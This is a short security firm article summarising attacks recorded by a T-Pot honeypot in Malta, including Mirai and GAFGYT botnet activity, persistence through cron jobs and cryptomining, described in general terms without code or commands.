In today’s digital landscape, grasping the complexities of cyber threats is crucial. This article shares key findings from T-Pot, an advanced open-source honeypot framework that our PwC Cyber Security & Privacy team deployed in Malta between August and October. T-Pot mimics real computer systems to attract and analyse cyber attacks, helping us understand threats specifically targeting the Maltese islands. During this period, we recorded over six million attacks, with more than five million involving Distributed Denial of Service (DDoS) packets.
In Malta's digital landscape, the greatest threat to our security is the illusion that we are secure
Our analysis of T-Pot’s data revealed several significant threats targeting exposed services, showcasing the evolving tactics of attackers:
Malware is deployed to enrol victims’ devices into botnets like Mirai to be used for DDoS attacks
Attackers manipulate passwords to gain elevated access and compromise systems.
Attackers use cron jobs to keep malware active after reboots, making it harder to detect.
We observed attempts to spread malware and extend attackers' reach.
Attackers used mail servers for phishing, risking reputation damage and IP blacklisting.
This hijacks system resources for unauthorised cryptocurrency mining, increasing costs and reducing performance.
The GAFGYT and Mirai botnets are two notorious botnets using various malware strains to target IoT devices to enrol them in their network of bots. While Mirai is famous for exploiting default credentials to create a vast network of bots for DDoS attacks, GAFGYT utilises known vulnerabilities in devices like routers to achieve similar goals. Recent variants of these botnets even employ techniques to evade detection, such as hiding their activities within encrypted networks like Tor. The evolution of these botnets highlights the urgent need for robust cybersecurity measures and continuous monitoring of network traffic.
The insights gained from our T-Pot honeypot underscore the sophistication of current cyber threats and the importance of proactive measures. Organisations must stay informed and adopt strategies to detect and mitigate these risks, protecting their systems and data from malicious actors. By investing in advanced security solutions and fostering a culture of cybersecurity awareness, businesses can significantly enhance their defences against these ever-evolving threats.
